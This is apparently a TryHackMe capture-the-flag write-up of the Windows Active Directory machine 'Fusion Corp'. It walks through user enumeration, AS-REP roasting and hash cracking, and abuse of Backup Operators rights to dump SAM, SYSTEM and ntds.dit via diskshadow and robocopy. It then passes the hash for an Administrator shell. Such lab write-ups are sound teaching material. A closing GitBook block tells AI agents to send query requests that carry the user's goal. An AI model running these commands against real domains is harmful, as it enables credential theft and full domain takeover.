> For the complete documentation index, see [llms.txt](https://ajaykumar-kanthi.gitbook.io/write-ups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ajaykumar-kanthi.gitbook.io/write-ups/tryhackme-oscp-machines/thm-fusion-corp.md).

# THM - Fusion Corp

Fusion Corp is a Windows Active Directory machine on TryHackMe.

## Nmap

```bash
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-favicon: Unknown favicon MD5: FED84E16B6CCFE88EE7FFAAE5DFEFD34
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: eBusiness Bootstrap Template
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-03-02 19:21:36Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: fusion.corp0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: fusion.corp0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=Fusion-DC.fusion.corp
| Issuer: commonName=Fusion-DC.fusion.corp
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-03-01T19:12:20
| Not valid after:  2026-08-31T19:12:20
| MD5:   1455:1b41:7007:bf5a:e187:6d08:2556:5e87
|_SHA-1: 8540:8a27:dcd5:f089:c621:4638:a6e0:69c8:5927:4ca2
|_ssl-date: 2026-03-02T19:23:13+00:00; 0s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: FUSION
|   NetBIOS_Domain_Name: FUSION
|   NetBIOS_Computer_Name: FUSION-DC
|   DNS_Domain_Name: fusion.corp
|   DNS_Computer_Name: Fusion-DC.fusion.corp
|   Product_Version: 10.0.17763
|_  System_Time: 2026-03-02T19:22:33+00:00
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
49671/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49696/tcp open  msrpc         Microsoft Windows RPC
49826/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2019
Aggressive OS guesses: Windows Server 2019 (97%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 3 hops
TCP Sequence Prediction: Difficulty=254 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: FUSION-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
```

Domain: `fusion.corp` — add to `/etc/hosts`.

### SMB&#x20;

```bash
┌──(ajay㉿kali)-[~]
└─$ smbclient -L \\\\10.81.176.29\\   
Password for [WORKGROUP\ajay]:
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.81.176.29 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available     
```

Anonymous login succeeds but no shares are listed.

### HTTP

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F0nJXM6Rp6jJOSYXBYpg7%2Fimage.png?alt=media&amp;token=e5e8e206-aefd-4d5e-a297-c12f1d631cde" alt=""><figcaption></figcaption></figure>

Browsing the site reveals employee names on the page — potential usernames.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F4FIjMwlQRN13q6xRoyAN%2Fimage.png?alt=media&amp;token=ae91605d-ef31-4b2b-a643-20deadbd2541" alt=""><figcaption></figcaption></figure>

#### Directory Enumeration

```bash
┌──(ajay㉿kali)-[~]
└─$ gobuster dir -u http://10.81.176.29/ -w /usr/share/dirb/wordlists/big.txt 
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.81.176.29/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirb/wordlists/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/backup               (Status: 301) [Size: 150] [--> http://10.81.176.29/backup/]
/contactform          (Status: 301) [Size: 155] [--> http://10.81.176.29/contactform/]
/css                  (Status: 301) [Size: 147] [--> http://10.81.176.29/css/]
/img                  (Status: 301) [Size: 147] [--> http://10.81.176.29/img/]
/js                   (Status: 301) [Size: 146] [--> http://10.81.176.29/js/]
/lib                  (Status: 301) [Size: 147] [--> http://10.81.176.29/lib/]
Progress: 20469 / 20469 (100.00%)
===============================================================
Finished
===============================================================         
```

A `/backup` directory is found. Inside it contains a file with a list of potential usernames.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FQVbbwEFFzLCqo60UxQpY%2Fimage.png?alt=media&amp;token=503fb51d-3c0f-4471-8cb2-901a75c7b4ec" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fd3JERw6fr8pVXHxm3f34%2Fimage.png?alt=media&amp;token=779d8a07-b81d-4744-9645-ba8e71196bc1" alt=""><figcaption></figcaption></figure>

## Initial Access

### Kerbrute ( User Enumeration )

Using the usernames collected from the backup folder:

```bash
┌──(ajay㉿kali)-[~/Tools]
└─$ ./kerbrute_linux_amd64 userenum -d fusion.corp --dc 10.81.176.29 ~/users.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 03/02/26 - Ronnie Flathers @ropnop

2026/03/02 15:04:35 >  Using KDC(s):
2026/03/02 15:04:35 >   10.81.176.29:88

2026/03/02 15:04:35 >  [+] VALID USERNAME:       lparker@fusion.corp
2026/03/02 15:04:36 >  Done! Tested 11 usernames (1 valid) in 0.207 seconds
```

One valid user found: `lparker@fusion.corp.`

Since we have no password, check if the account has pre-authentication disabled.

### AsrepRoast

```bash
┌──(ajay㉿kali)-[~]
└─$ impacket-GetNPUsers fusion.corp/lparker -dc-ip 10.81.176.29 -no-pass -format hashcat -outputfile asrep_hashes.txt 

Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Getting TGT for lparker
$krb5asrep$23$lparker@FUSION.CORP:31c3255be3eac73b4b0efecee3251954$32e41fb20cb736bf0d3fab73d2c7ec0e42cc95fae2da5be6f3af99ee3dee842269d282d10d2bb2993fca511454d20360f3240ea21f28128714537582be3d1c759ea82b6ca37bba8afff92748d0506f4a8c09ba25df0c46750f730abb4f48718ad9d27b02ff3ec096f75ba156ac06b0102f30069c42f970b58387162218676b1b1280cafa968f8afa20e05888131aa55a0a9b22ea5baf6c97390793fee4c08082d920a07411a05d094e3f7f23432ed6946d730109c227680a051b5bddc17bd03e39a7d14abdb0dc96f76f74ca43d4f1818896960023462cc61cefa5159e4ce728fa0cd20638dd8bf8b8b9
```

Hash obtained. Crack it with Hashcat:

```bash
┌──(ajay㉿kali)-[~]
└─$ hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt
$krb5asrep$23$lparker@FUSION.CORP:31c3255be3eac73b4b0efecee3251954$32e41fb20cb736bf0d3
fab73d2c7ec0e42cc95fae2da5be6f3af99ee3dee842269d282d10d2bb2993fca511454d20360f3240ea21
f28128714537582be3d1c759ea82b6ca37bba8afff92748d0506f4a8c09ba25df0c46750f730abb4f48718
ad9d27b02ff3ec096f75ba156ac06b0102f30069c42f970b58387162218676b1b1280cafa968f8afa20e05
888131aa55a0a9b22ea5baf6c97390793fee4c08082d920a07411a05d094e3f7f23432ed6946d730109c22
7680a051b5bddc17bd03e39a7d14abdb0dc96f76f74ca43d4f1818896960023462cc61cefa5159e4ce728f
a0cd20638dd8bf8b8b9:!!abbylvzsvs2k6!
```

Credentials: `lparker : !!abbylvzsvs2k6!`

Validating credentials through NetExec

```bash
──(ajay㉿kali)-[~]
└─$ nxc smb 10.81.176.29 -u lparker -p '!!abbylvzsvs2k6!'
SMB         10.81.176.29    445    FUSION-DC        [*] Windows 10 / Server 2019 Build 17763 x64 (name:FUSION-DC) (domain:fusion.corp) (signing:True) (SMBv1:False) 
SMB         10.81.176.29    445    FUSION-DC        [+] fusion.corp\lparker:!!abbylvzsvs2k6! 
The creds are valid.
```

### Shell as Lparker

Lparker as rdp access which can be confirmed by using netexec.

```bash
┌──(ajay㉿kali)-[~]
└─$ nxc rdp 10.81.176.104 -u lparker -p '!!abbylvzsvs2k6!'
RDP         10.81.176.104   3389   FUSION-DC        [*] Windows 10 or Windows Server 2016 Build 17763 (name:FUSION-DC) (domain:fusion.corp) (nla:True)
RDP         10.81.176.104   3389   FUSION-DC        [+] fusion.corp\lparker:!!abbylvzsvs2k6! 
```

We can winrm to the target host and collect the flag.txt file located in the desktop folder of lparker.

```bash
┌──(ajay㉿kali)-[~]
└─$ evil-winrm -i 10.81.176.104 -u lparker -p '!!abbylvzsvs2k6!'
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\lparker\Documents> 
*Evil-WinRM* PS C:\Users\lparker\Desktop> dir

    Directory: C:\Users\lparker\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         3/3/2021   6:04 AM             37 flag.txt


*Evil-WinRM* PS C:\Users\lparker\Desktop> cat flag.txt
THM{***************************}
*Evil-WinRM* PS C:\Users\lparker\Desktop>
```

## Privilege Escalation

```bash
*Evil-WinRM* PS C:\Users> dir


    Directory: C:\Users


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         3/3/2021   3:49 AM                Administrator
d-----         3/3/2021   5:54 AM                jmurphy
d-----         3/3/2021   5:54 AM                lparker
d-r---         3/3/2021   3:49 AM                Public
```

The Users directory leaks other users on the machine.

```bash
*Evil-WinRM* PS C:\Users> net user jmurphy
User name                    jmurphy
Full Name                    Joseph Murphy
Comment                      Password set to u8WC3!kLsgw=#bRY
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            3/3/2021 5:41:24 AM
Password expires             Never
Password changeable          3/3/2021 5:41:24 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never

Logon hours allowed          All

Local Group Memberships      *Backup Operators     *Remote Management Use
Global Group memberships     *Domain Users
The command completed successfully.

*Evil-WinRM* PS C:\Users> 
```

During the enumeration of user accounts, a cleartext password for jmurphy was discovered within an account comment field. Further analysis of the account's privileges revealed that jmurphy is a member of the Backup Operators group, presenting a direct path for high-privilege escalation.

### Shell  as Jmurphy

Obtained a shell using the discovered credentials and grabbed the second flag.

```bash
──(ajay㉿kali)-[~]
└─$ evil-winrm -i 10.81.176.104 -u jmurphy -p 'u8WC3!kLsgw=#bRY'
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\jmurphy\Documents> 

*Evil-WinRM* PS C:\Users\jmurphy\Desktop> dir


    Directory: C:\Users\jmurphy\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         3/3/2021   6:04 AM             37 flag.txt


*Evil-WinRM* PS C:\Users\jmurphy\Desktop> cat flag.txt
THM{**************************}
*Evil-WinRM* PS C:\Users\jmurphy\Desktop>
```

I ran `whoami /all` to check the account's context and privileges. The output confirmed that we are running with a High Integrity token and, more importantly, `jmurphy` is part of the Backup Operators group. This gives us both SeBackupPrivilege and SeRestorePrivilege enabled. Since these privileges allow us to bypass file system ACLs to read or restore restricted files, our next immediate step for privilege escalation is to leverage this access to dump sensitive system files or registry hives.

```powershell
*Evil-WinRM* PS C:\Users\jmurphy\Desktop> whoami /all

USER INFORMATION
----------------

User Name      SID
============== =============================================
fusion\jmurphy S-1-5-21-1898838421-3672757654-990739655-1104


GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators                   Alias            S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\jmurphy\Desktop> 
```

### Exploiting SeBackup Privilege

First, I created a temporary staging folder (`C:\Temp`) to hold our looted files. Since `jmurphy` has backup privileges, we can bypass normal restrictions and dump the registry hives directly. I ran `reg save hklm\sam c:\Temp\sam` and `reg save hklm\system c:\Temp\system` to save copies of the Security Account Manager (SAM) and the SYSTEM hives to our temp folder. Both commands completed successfully, setting us up perfectly to exfiltrate them to our attacking machine.

```powershell
*Evil-WinRM* PS C:\> mkdir Temp
    Directory: C:\
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         3/2/2026  12:49 PM                Temp


*Evil-WinRM* PS C:\> reg save hklm\sam c:\Temp\sam
The operation completed successfully.

*Evil-WinRM* PS C:\> reg save hklm\system c:\Temp\system
The operation completed successfully.
```

After saving the hives to `C:\Temp`, I used Evil-WinRM's built-in `download` command to pull both the `sam` and `system` files back to my attacking machine.

```powershell
*Evil-WinRM* PS C:\Temp> download sam                                       
Info: Downloading C:\Temp\sam to sam                                 
Info: Download successful!

*Evil-WinRM* PS C:\Temp> download system                                       
Info: Downloading C:\Temp\system to system
Info: Download successful!
```

Now that we have them locally, we can feed them into tools like `secretsdump.py` or `pypykatz` to extract the local Administrator's NTLM hash and completely compromise the machine.

```
┌──(ajay㉿kali)-[~]
└─$ impacket-secretsdump -sam sam -system system LOCAL
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0xeafd8ccae4277851fc8684b967747318
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2182eed0101516d0a206b98c579565e6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Cleaning up...                                                                                                                                                                    
```

I ran `impacket-secretsdump` and successfully pulled the local NTLM hashes, including the local Administrator.

But here is the catch: the target administrator account we actually need is a Domain account, not a local one! The local SAM database only handles authentication for local machine accounts. This means our freshly looted local Administrator hash won't let us pass-the-hash to become the domain administrator directly.

However, having full local admin rights over this workstation means we can now run tools with high integrity to hunt for domain credentials cached in memory (like dumping LSASS or harvesting Kerberos tickets) to complete the domain compromise.

### Extracting NTDS.DIT&#x20;

Because the Active Directory database (`ntds.dit`) is continuously locked by the operating system, a non-interactive Volume Shadow Copy abstraction technique was executed via `diskshadow.exe`. Since standard RDP access was unavailable, an automated script (`backup.txt`) was staged in DOS format (`CRLF`) to provision a snapshot of the `C:` drive and expose it as a logical `E:` drive.

```bash
step 1: create a script : backup.txt
set verbose on
set metadata C:\Windows\Temp\meta.cab
set context clientaccessible
set context persistent
begin backup
add volume C: alias cdrive
create
expose %cdrive% E:
end backup

Step 2 : convert the file to windows format
┌──(ajay㉿kali)-[~]
└─$ unix2dos backup.txt
unix2dos: converting file backup.txt to DOS format...
                                                                                                                                                                                                                                            
┌──(ajay㉿kali)-[~]
└─$ file backup.txt                                                                           
backup.txt: ASCII text, with CRLF line terminators

Step 3 : upload it to the winrm session Temp directory
*Evil-WinRM* PS C:\Temp> upload backup.txt
                                        
Info: Uploading /home/ajay/backup.txt to C:\Temp\backup.txt
                                        
Data: 240 bytes of 240 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Temp> 

Step 4 : Run the script using diskshadow 
*Evil-WinRM* PS C:\Temp> diskshadow /s backup.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer:  FUSION-DC,  3/2/2026 1:26:56 PM

-> set verbose on
-> set metadata C:\Windows\Temp\meta.cab
-> set context clientaccessible
-> set context persistent
-> begin backup
-> add volume C: alias cdrive
-> create
Excluding writer "Shadow Copy Optimization Writer", because all of its components have been excluded.
Component "\BCD\BCD" from writer "ASR Writer" is excluded from backup,
because it requires volume  which is not in the shadow copy set.
The writer "ASR Writer" is now entirely excluded from the backup because the top-level
non selectable component "\BCD\BCD" is excluded.

* Including writer "Task Scheduler Writer":
        + Adding component: \TasksStore

* Including writer "VSS Metadata Store Writer":
        + Adding component: \WriterMetadataStore

* Including writer "Performance Counters Writer":
        + Adding component: \PerformanceCounters

* Including writer "System Writer":
        + Adding component: \System Files
        + Adding component: \Win32 Services Files

* Including writer "DFS Replication service writer":
        + Adding component: \SYSVOL\3656A825-08E2-4C77-82F0-0F07EC965204-BFD185EF-4D5F-44A5-950B-C2222C20A32C

* Including writer "Registry Writer":
        + Adding component: \Registry

* Including writer "NTDS":
        + Adding component: \C:_Windows_NTDS\ntds

* Including writer "COM+ REGDB Writer":
        + Adding component: \COM+ REGDB

* Including writer "WMI Writer":
        + Adding component: \WMI

Alias cdrive for shadow ID {c22ede6a-0377-4fe7-8939-53de304b578d} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {935d7437-6d98-4a11-b739-415a1a74b764} set as environment variable.
Inserted file Manifest.xml into .cab file meta.cab
Inserted file BCDocument.xml into .cab file meta.cab
Inserted file WM0.xml into .cab file meta.cab
Inserted file WM1.xml into .cab file meta.cab
Inserted file WM2.xml into .cab file meta.cab
Inserted file WM3.xml into .cab file meta.cab
Inserted file WM4.xml into .cab file meta.cab
Inserted file WM5.xml into .cab file meta.cab
Inserted file WM6.xml into .cab file meta.cab
Inserted file WM7.xml into .cab file meta.cab
Inserted file WM8.xml into .cab file meta.cab
Inserted file WM9.xml into .cab file meta.cab
Inserted file WM10.xml into .cab file meta.cab
Inserted file Dis6BAD.tmp into .cab file meta.cab

Querying all shadow copies with the shadow copy set ID {935d7437-6d98-4a11-b739-415a1a74b764}

        * Shadow copy ID = {c22ede6a-0377-4fe7-8939-53de304b578d}               %cdrive%
                - Shadow copy set: {935d7437-6d98-4a11-b739-415a1a74b764}       %VSS_SHADOW_SET%
                - Original count of shadow copies = 1
                - Original volume name: \\?\Volume{66a659a9-0000-0000-0000-602200000000}\ [C:\]
                - Creation time: 3/2/2026 1:27:38 PM
                - Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2
                - Originating machine: Fusion-DC.fusion.corp
                - Service machine: Fusion-DC.fusion.corp
                - Not exposed
                - Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
                - Attributes:  No_Auto_Release Persistent Differential

Number of shadow copies listed: 1
-> expose %cdrive% E:
-> %cdrive% = {c22ede6a-0377-4fe7-8939-53de304b578d}
The shadow copy was successfully exposed as E:\.
-> end backup
->

Step 5 : copy the ntds file using the robocopy.
*Evil-WinRM* PS C:\Temp> robocopy /B E:\Windows\NTDS\ C:\Temp\ ntds.dit

-------------------------------------------------------------------------------
   ROBOCOPY     ::     Robust File Copy for Windows
-------------------------------------------------------------------------------

  Started : Monday, March 2, 2026 1:30:16 PM
   Source : E:\Windows\NTDS\
     Dest : C:\Temp\

    Files : ntds.dit

  Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30

------------------------------------------------------------------------------

                           1    E:\Windows\NTDS\
            New File              16.0 m        ntds.dit
------------------------------------------------------------------------------

               Total    Copied   Skipped  Mismatch    FAILED    Extras
    Dirs :         1         0         1         0         0         0
   Files :         1         1         0         0         0         0
   Bytes :   16.00 m   16.00 m         0         0         0         0
   Times :   0:00:00   0:00:00                       0:00:00   0:00:00


   Speed :            89717732 Bytes/sec.
   Speed :            5133.689 MegaBytes/min.
   Ended : Monday, March 2, 2026 1:30:16 PM
   
   Step 6 : Download the ntds.dit file along with sam and system files.
   # Download the loot
download C:\Temp\ntds.dit
download C:\Temp\system.bak

# Unexpose the drive and remove the shadow copy
diskshadow
unexpose E:
delete shadows all
exit
```

The script executed successfully, mounting the snapshot volume to `E:\`. Native `robocopy.exe` with the backup flag (`/B`) was then used to copy the live `ntds.dit` file out of the protected shadow directory structure into `C:\Temp\`.

Following database exfiltration, the logical volume was cleaned up (`unexpose E:` and `delete shadows all`).

Next the loot collected is served to secretsdump to dump the admin hashes.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FeF7rUcFzcQqPOfeuqOmT%2Fimage.png?alt=media&amp;token=c469e87e-2447-4cef-8864-55c8603a6131" alt=""><figcaption></figcaption></figure>

### Shell as Administrator

Using the hashes we can use winrm to gain a shell access to Administrator and collected the final flag.

```powershell
┌──(ajay㉿kali)-[~]
└─$ evil-winrm -i 10.81.176.104 -u administrator -H 9653b02d945329c7270525c4c2a69c67
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
*Evil-WinRM* PS C:\Users\Administrator> type desktop\flag.txt
THM{*****************************}
```

## Key Takeaways

* Always enumerate web directories — backup folders frequently expose sensitive files
* `SeBackupPrivilege` is a critical misconfiguration on domain controllers; members of `Backup Operators` can dump the entire AD database
* Passwords stored in user `Comment`/`Description` fields are a common AD misconfiguration
* ASREPRoasting works on accounts with Kerberos pre-authentication disabled — always pair with a strong wordlist


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://ajaykumar-kanthi.gitbook.io/write-ups/tryhackme-oscp-machines/thm-fusion-corp.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
